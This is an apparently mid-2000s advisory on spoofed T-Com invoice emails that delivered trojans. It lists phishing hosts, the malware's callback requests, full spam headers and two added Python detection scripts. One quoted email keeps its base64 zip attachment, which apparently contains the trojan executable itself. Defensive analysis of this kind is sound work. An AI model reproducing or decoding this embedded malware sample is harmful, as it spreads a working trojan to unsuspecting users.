Fake T-Com invoices (phishing)

Between November 2004 and July 2005, four incidents took place in which customers of T-Com, the largest ISP in Germany, were attacked. Using spam and spamvertized websites all connected to a specific internet provider in the USA, the criminals attempted to install "trojan horse" software on the victims' computers, which for example might allow them to steal passwords for online banking or to conduct cyber attacks. We don't know why all these spams are connected to the same webhosting company or who is behind the crimes. The fact that the same company keeps appearing in these scams is particularly worrying.
It appears that the criminals first hacked into at least four different websites, all hosted by the same provider (probably all sites at that provider are vulnerable). Then they uploaded a scam page that looks like the billing page of T-Com. Finally they sent out fake monthly invoice notifications with a link to the scam page. A Javascript module on the hacked websites tries to install a Trojan on the visitor's machine. Unless current security updates are in place this may well succeed. Be careful when logging into a website using a link provided in an email. Make sure you double check the URL of the website that you are directed to.
Example #1:
From: Deutsche Telekom AG <Rechnung-Online@telekom.de>

Example #2:
From: Deutsche Telekom AG <Rechnung-Online@telekom.de>

Phishing URLs:
Name: kimlafleur.com
Address: 66.235.192.211

Name: alkhalaf.net
Address: 66.235.192.199

Name: ntuaa-dfw.org
Address: 66.235.192.141

Name: noharmm.org
Address: 66.235.192.145

OrgName: iPowerWeb, Inc.
OrgID: IPOWE
Address: 2800 28th Street Suite 205
City: Santa Monica
StateProv: CA

Javascript code on the site downloads an MS-DOS executable which opens two ports on the client machine: 49999 and 25677. It then runs a PHP script on a server in Denmark (tobiasfriis.dk / 193.201.35.63) by issuing an HTTP GET for the URL /csrv.php, passing the following parameters:

socketport=49999
httpport=25677
uptimem=31
uptimeh=12
uid=
scode=

Then it issues an HTTP POST to /dat7.php.
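The callback described above (a GET to /csrv.php reporting the two opened ports, followed by a POST to /dat7.php on the same host) is easy to spot in outbound proxy logs. The following is an added example, not code from the original page: it scans a few constructed log lines in a simplified "timestamp client method url status" format (the format itself is an assumption of this example) and flags requests that match the host, path and parameter set given in the write-up.

```python
"""Flag the two-step callback described in the write-up in web-proxy logs."""
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the write-up: the callback host and its IP, the two
# PHP paths, the parameter set the downloader sends, and the ports it opens.
CALLBACK_HOSTS = {"tobiasfriis.dk", "193.201.35.63"}
CALLBACK_PATHS = {"/csrv.php", "/dat7.php"}
EXPECTED_PARAMS = {"socketport", "httpport", "uptimem", "uptimeh", "uid", "scode"}
OPENED_PORTS = {"49999", "25677"}

# Constructed sample log (not real traffic): three harmless requests plus the
# GET/POST pair an infected client would produce. Format is an assumption:
# <timestamp> <client_ip> <method> <url> <status>
SAMPLE_LOG = """\
2005-01-29T17:50:01 10.0.0.12 GET http://www.t-com.de/rechnung 200
2005-01-29T17:50:03 10.0.0.12 GET http://tobiasfriis.dk/csrv.php?socketport=49999&httpport=25677&uptimem=31&uptimeh=12&uid=&scode= 200
2005-01-29T17:50:04 10.0.0.12 POST http://193.201.35.63/dat7.php 200
2005-01-29T17:51:10 10.0.0.33 GET http://example.org/csrv.php?page=1 404
2005-01-29T17:52:00 10.0.0.45 GET http://www.example.com/index.html 200
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d+)$"
)


def classify(line):
    """Return (reasons, client, url) if the line matches the callback pattern,
    otherwise None. Reasons are comma-joined so a single hit can carry several."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    host = (url.hostname or "").lower()
    reasons = []
    if host in CALLBACK_HOSTS:
        reasons.append("known-callback-host")
    if url.path in CALLBACK_PATHS:
        # keep_blank_values so the empty uid= and scode= still count as present
        params = parse_qs(url.query, keep_blank_values=True)
        # Match on the full parameter set rather than the path alone, so an
        # unrelated csrv.php page on some other site is not flagged.
        if EXPECTED_PARAMS <= set(params):
            reasons.append("callback-parameters")
            if {params["socketport"][0], params["httpport"][0]} & OPENED_PORTS:
                reasons.append("known-backdoor-port")
        elif m["method"] == "POST" and host in CALLBACK_HOSTS:
            reasons.append("callback-post")
    if not reasons:
        return None
    return (",".join(reasons), m["client"], m["url"])


def scan(log_text):
    """Scan a whole log and return the list of matched (reasons, client, url)."""
    hits = []
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for reasons, client, url in scan(SAMPLE_LOG):
        print(f"{client} {reasons} {url}")
```

The unrelated `example.org/csrv.php?page=1` line is deliberately included: matching on the path alone would raise a false positive, so the check requires the full parameter set or a POST to one of the known hosts.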
New "T-COM invoice" trojan attack (2005-01-29)

On 2005-01-29 we received a new version of this malware email. The spam was sent from the same webhoster that hosted all the websites in the previous attack in November 2004. The attachment contains a small executable program "rechnung2005-02.pdf.exe" which Kaspersky Anti-Virus identifies as "Trojan-Downloader.Win32.Vidlo.h". We have notified ipowerweb.com of the problem. The fact that the previous attack used four existing accounts of their customers pointed away from particular customers and towards a basic security problem with iPowerWeb's hosting service, which they don't seem to have addressed in the more than two months that had passed.
Return-Path: <Rechnung-Online@t-com.net>
Received: from host175.ipowerweb.com (HELO host175.ipowerweb.com) (66.235.199.151) by mx0.gmx.net (mx061) with SMTP; 29 Jan 2005 17:44:54 +0100
Received: from oxhdxyai (242.0.54.62) by host175.ipowerweb.com; Sat, 29 Jan 2005 08:44:54 -0800
Message-ID: <000e01c47335$5b089cf2$db748a52@oxhdxyai>
Reply-To: <Rechnung-Online@t-com.net>
From: <Rechnung-Online@t-com.net>
To: <joewein@gmx.net>
Subject: =?koi8-r?B?UmVjaG51bmc=?=
Date: Sat, 29 Jan 2005 08:44:54 -0800
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0002_01C48A52.DB749CF2"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: -2 (not scanned, spam filter disabled)

------=_NextPart_000_0002_01C48A52.DB749CF2
Content-Type: text/plain; charset="koi8-r"
Content-Transfer-Encoding: quoted-printable

Guten Tag,

die Gesamtsumme f=D8r Ihre Rechnung im Monat Februar 2005 betr=C4gt: 144,81=
 Euro.

Mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung und - soweit von Ihnen
beauftragt - die Einzelverbindungs=D8bersicht.

Nutzen Sie auch unter www.t-com.de/rechnung die vielf=C4ltigen M=C3glichkei=
ten von Rechnung Online, wie z.B. Sortier- und Auswertungsfunktionen.

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D
RECHNUNG ONLINE - TIPP DES MONATS

Die aktuellen Top-Angebote der Deutschen Telekom finden Sie unter:
www.t-com.de/aktuell

Auskunft per SMS
Einfach Anfrage per SMS an die 11833* - Die Antwort kommt sekundenschnell z=
ur=D8ck.
11833* - Wir sind die Auskunft.
*pro SMS-Abfrage 69 Cent aus den dt. Mobilfunknetzen, 49 Cent aus dem Festn=
etz von T-Com.
Pro Anfrage per Telefonanruf einmalig 20 Cent zzgl. 99 Cent/Min.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D

Bei Fragen zu Rechnung Online oder zum Rechnungsinhalt klicken Sie bitte un=
ter www.t-com.de/rechnung (oben links) auf "Kontakt".

Mit freundlichen Gr=D8=F1en
Ihre T-Com

----------------------------------------------------------
Aktuelle Informationen zu den Allgemeinen Gesch=C4ftsbedingungen finden Sie=
 unter www.t-com.de/aktuell-agb.
Zum =E3ffnen der PDF-Dateien verwenden Sie bitte den Adobe Acrobat Reader a=
b Version 5.0.
Ist dieser auf Ihrem PC noch nicht installiert, k=C3nnen Sie die aktue=
lle Version unter www.t-com.de/pdf kostenlos herunterladen.

------=_NextPart_000_0002_01C48A52.DB749CF2
Content-Type: application/x-zip-compressed; name="=?koi8-r?B?OC56aXA=?="
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="=?koi8-r?B?OC56aXA=?="

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
------=_NextPart_000_0002_01C48A52.DB749CF2--
New "T-COM invoice" trojan attack (2005-05-24)

On 2005-05-24 we received yet another version of this malware email. This is the third T-Com invoice spoof in half a year, all from the same webhosting company. Previous attacks took place in November 2004 and January 2005. The most recent attachment contains a small executable program "2005-05-01.PDF.exe" which Kaspersky Anti-Virus identifies as "Trojan-Dropper.Win32.Agent.mc". We have notified ipowerweb.com of the problem. The fact that the first attack used four existing accounts of their customers pointed away from particular customers and towards a basic security problem with iPowerWeb's hosting service. They still don't seem to have addressed it, even four months after the second attack in January. Something smells very phishy here...
Received: from [66.235.192.134] (helo=host128.ipowerweb.com) by mxeu3.kundenserver.de with ESMTP (Nemesis), id 0MKqIe-1DaasZ0kPr-0007a2 for emailaddress; Tue, 24 May 2005 16:59:35 +0200
Received: from yxmxqpd (69.14.237.246) by host128.ipowerweb.com; Tue, 24 May 2005 07:59:29 -0700
Date: Tue, 24 May 2005 07:59:29 -0700
From:
UPDATE: New T-COM spam (2005-07-03)

Yet another Trojan arrived on 2005-07-03 from the same source, iPowerweb.

Guten Tag,

Message headers:

Received: from [66.235.192.134] (helo=host128.ipowerweb.com) by mxeu6.kundenserver.de with ESMTP (Nemesis), id 0MKsUu-1Dp8lB2JUr-0004Ov for info@cannabislegal.de; Sun, 03 Jul 2005 20:00:05 +0200
Received: from xiujoq (66.33.215.176) by host128.ipowerweb.com; Sun, 3 Jul 2005 11:00:00 -0700
Date: Sun, 3 Jul 2005 11:00:00 -0700
From: <Rechnung-Online@t-com.net>
X-Mailer: The Bat! (v2.01)
Reply-To: <Rechnung-Online@t-com.net>
X-Priority: 3 (Normal)
Message-ID: <5639420432.20050526140255@t-com.net>
To: <info@cannabislegal.de>
Subject: Rechnung Online Monat Juli 2005
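All three messages quoted on this page share the same tell-tale signs: a t-com.net sender handed to the recipient's MX by an ipowerweb.com host, a Message-ID minted on an unrelated machine, an RFC 2047 encoded subject, and an archive or double-extension attachment. The script below is an added example (not the page's own code) that runs those checks with the Python standard library's email parser. The sample message is constructed from the 2005-01-29 headers quoted above, with the body shortened and the attachment replaced by a placeholder; the domain-comparison heuristics and the extension lists are assumptions of this example, not rules from the write-up.

```python
"""Triage checks for a suspected invoice-spoof e-mail (standard library only)."""
import email
import re
from email.header import decode_header, make_header
from email.utils import parseaddr

# Constructed sample: headers of the 2005-01-29 message from the write-up,
# body shortened, attachment body replaced by a placeholder (not the real zip).
SAMPLE_MSG = """\
Return-Path: <Rechnung-Online@t-com.net>
Received: from host175.ipowerweb.com (HELO host175.ipowerweb.com) (66.235.199.151)
  by mx0.gmx.net (mx061) with SMTP; 29 Jan 2005 17:44:54 +0100
Received: from oxhdxyai (242.0.54.62) by host175.ipowerweb.com; Sat, 29 Jan 2005 08:44:54 -0800
Message-ID: <000e01c47335$5b089cf2$db748a52@oxhdxyai>
Reply-To: <Rechnung-Online@t-com.net>
From: <Rechnung-Online@t-com.net>
To: <joewein@gmx.net>
Subject: =?koi8-r?B?UmVjaG51bmc=?=
Date: Sat, 29 Jan 2005 08:44:54 -0800
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0002_01C48A52.DB749CF2"

------=_NextPart_000_0002_01C48A52.DB749CF2
Content-Type: text/plain; charset="koi8-r"
Content-Transfer-Encoding: quoted-printable

Guten Tag, die Gesamtsumme f=D8r Ihre Rechnung im Monat Februar 2005 betr=C4gt: 144,81 Euro.

------=_NextPart_000_0002_01C48A52.DB749CF2
Content-Type: application/x-zip-compressed; name="=?koi8-r?B?OC56aXA=?="
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="=?koi8-r?B?OC56aXA=?="

UEsDBBQAAgAIAA==
------=_NextPart_000_0002_01C48A52.DB749CF2--
"""

# Extension lists are an assumption of this example.
EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd"}
DOC_EXTS = {".pdf", ".doc", ".xls", ".txt"}
ARCHIVE_EXTS = {".zip", ".rar"}


def decode_rfc2047(value):
    """Turn an RFC 2047 header value such as =?koi8-r?B?...?= into plain text."""
    return str(make_header(decode_header(value or "")))


def suspicious_name(name):
    """Classify an attachment file name; returns a reason string or None."""
    parts = name.lower().rsplit(".", 2)
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext in EXEC_EXTS:
        # "rechnung2005-02.pdf.exe": a document-looking name hiding an executable
        if len(parts) == 3 and "." + parts[1] in DOC_EXTS:
            return "double-extension-executable"
        return "executable"
    if ext in ARCHIVE_EXTS:
        return "archive"
    return None


def handoff_host(msg):
    """Host named in the outermost Received line, i.e. the machine that handed
    the message to our own MX. Bracketed IP literals are accepted too."""
    received = msg.get_all("Received") or []
    m = re.search(r"from\s+\[?([\w.-]+)", received[0]) if received else None
    return m.group(1).lower() if m else ""


def triage(raw):
    """Parse a raw message and return decoded fields plus a list of findings."""
    msg = email.message_from_string(raw)
    sender = parseaddr(msg.get("From", ""))[1].lower()
    sender_domain = sender.rpartition("@")[2]
    findings = []

    # Heuristic: an ISP's own invoice mail should reach us from its own domain.
    host = handoff_host(msg)
    if host and not (host == sender_domain or host.endswith("." + sender_domain)):
        findings.append(f"handoff host {host} is not in sender domain {sender_domain}")

    # Heuristic: Message-ID domain normally matches the originating system.
    msgid_domain = msg.get("Message-ID", "").rpartition("@")[2].rstrip(">").lower()
    if msgid_domain and msgid_domain != sender_domain:
        findings.append(f"Message-ID domain {msgid_domain} differs from sender domain")

    attachments = []
    for part in msg.walk():
        if part.get_content_disposition() == "attachment" or part.get_filename():
            name = decode_rfc2047(part.get_filename())
            attachments.append(name)
            reason = suspicious_name(name)
            if reason:
                findings.append(f"attachment {name}: {reason}")

    return {
        "subject": decode_rfc2047(msg.get("Subject", "")),
        "sender_domain": sender_domain,
        "handoff_host": host,
        "attachments": attachments,
        "findings": findings,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_MSG)
    print(result["subject"], result["attachments"])
    for finding in result["findings"]:
        print("-", finding)
```

Decoding the encoded words matters here: the subject hides behind a koi8-r encoded word and the attachment name only becomes "8.zip" after decoding, so a filter that looks at the raw header text never sees the archive extension. The same `suspicious_name` check catches the later samples' "2005-05-01.PDF.exe" once the zip is opened.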